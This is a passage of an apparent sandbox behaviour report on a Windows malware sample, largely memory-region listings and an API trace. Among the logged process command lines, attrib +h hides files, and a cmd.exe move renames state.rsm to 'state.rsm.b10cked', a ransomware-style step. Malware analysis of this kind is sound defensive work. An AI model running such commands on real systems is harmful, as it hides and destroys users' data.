"c:\\windows\\system32\\sechost.dll") Region: id = 30439 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename 
= "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30440 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30441 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 30442 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30443 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 693 os_tid = 0x81c Process: id = "497" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16bc0" os_pid = "0xa08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "494" os_parent_pid = "0x4d4" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30444 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30445 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 
30446 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30447 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 30448 start_va = 0x130000 end_va = 0x136fff entry_point = 0x130000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30449 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30450 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30451 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30452 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 30453 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30454 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30455 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30456 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30457 start_va = 
0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 30458 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 30459 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30460 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30461 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30462 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30463 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30464 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30465 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30466 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" 
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30467 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30468 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30469 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30470 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30471 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 30472 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30473 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 694 os_tid = 0xfb4 Process: id = "498" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16f20" os_pid = "0xd88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "494" os_parent_pid = "0x4d4" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = 
"CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30474 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30475 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30476 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30477 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 30478 start_va = 0xee0000 end_va = 0xee6fff entry_point = 0xee0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30479 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30480 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30481 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30482 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 30483 start_va = 
0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30484 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30485 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30486 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30487 start_va = 0x1b0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 30488 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 30489 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30490 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30491 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30492 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30493 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = 
"\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30494 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30495 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30496 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30497 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30498 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30499 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30500 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30501 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 30502 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") 
Region: id = 30503 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 695 os_tid = 0x720 Process: id = "499" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0xf28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30516 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30517 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30518 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30519 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 30520 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30521 start_va = 
0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30522 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30523 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30524 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 30525 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30546 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30547 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30548 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30549 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 30550 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 30551 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30552 start_va = 0x75540000 
end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30553 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30554 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30555 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30556 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30557 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30558 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30559 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30560 start_va = 0x420000 end_va = 0x4e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 30561 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" 
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30562 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30563 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 30564 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 30565 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 30566 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 30567 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 30568 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 30569 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Thread: id = 696 os_tid = 0x670 [0207.236] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fc64 | out: lpSystemTimeAsFileTime=0x16fc64*(dwLowDateTime=0xb0547a20, dwHighDateTime=0x1d440a9)) [0207.237] GetCurrentProcessId () returned 0xf28 [0207.237] GetCurrentThreadId () returned 0x670 [0207.237] GetTickCount () returned 0x3a4d6 [0207.237] QueryPerformanceCounter (in: lpPerformanceCount=0x16fc5c | out: lpPerformanceCount=0x16fc5c*=26402581915) returned 1 [0207.237] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0207.237] __set_app_type (_Type=0x1) [0207.237] __p__fmode () returned 
0x76b331f4 [0207.237] __p__commode () returned 0x76b331fc [0207.237] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0207.237] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0207.238] GetCurrentThreadId () returned 0x670 [0207.238] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x670) returned 0x38 [0207.238] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0207.238] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0207.238] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.238] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0207.238] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fbf4 | out: phkResult=0x16fbf4*=0x0) returned 0x2 [0207.238] VirtualQuery (in: lpAddress=0x16fc2b, lpBuffer=0x16fbc4, dwLength=0x1c | out: lpBuffer=0x16fbc4*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.238] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fbc4, dwLength=0x1c | out: lpBuffer=0x16fbc4*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0207.238] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fbc4, dwLength=0x1c | out: lpBuffer=0x16fbc4*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0207.238] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fbc4, dwLength=0x1c | out: lpBuffer=0x16fbc4*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, 
RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.238] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fbc4, dwLength=0x1c | out: lpBuffer=0x16fbc4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0207.238] GetConsoleOutputCP () returned 0x1b5 [0207.238] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.238] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0207.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.238] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0207.239] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.239] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0207.239] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.239] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0207.239] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.239] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0207.239] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.239] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0207.239] GetEnvironmentStringsW () returned 0x330190* [0207.239] FreeEnvironmentStringsW (penv=0x330190) returned 1 [0207.240] GetEnvironmentStringsW () returned 0x330190* [0207.240] FreeEnvironmentStringsW (penv=0x330190) returned 1 [0207.240] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb64 | out: phkResult=0x16eb64*=0x40) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x0, lpData=0x16eb70*=0xb8, lpcbData=0x16eb68*=0x1000) returned 0x2 [0207.240] RegQueryValueExW (in: hKey=0x40, 
lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x4, lpData=0x16eb70*=0x1, lpcbData=0x16eb68*=0x4) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x0, lpData=0x16eb70*=0x1, lpcbData=0x16eb68*=0x1000) returned 0x2 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x4, lpData=0x16eb70*=0x0, lpcbData=0x16eb68*=0x4) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x4, lpData=0x16eb70*=0x40, lpcbData=0x16eb68*=0x4) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x4, lpData=0x16eb70*=0x40, lpcbData=0x16eb68*=0x4) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x0, lpData=0x16eb70*=0x40, lpcbData=0x16eb68*=0x1000) returned 0x2 [0207.240] RegCloseKey (hKey=0x40) returned 0x0 [0207.240] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb64 | out: phkResult=0x16eb64*=0x40) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x0, lpData=0x16eb70*=0x40, lpcbData=0x16eb68*=0x1000) returned 0x2 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb6c, 
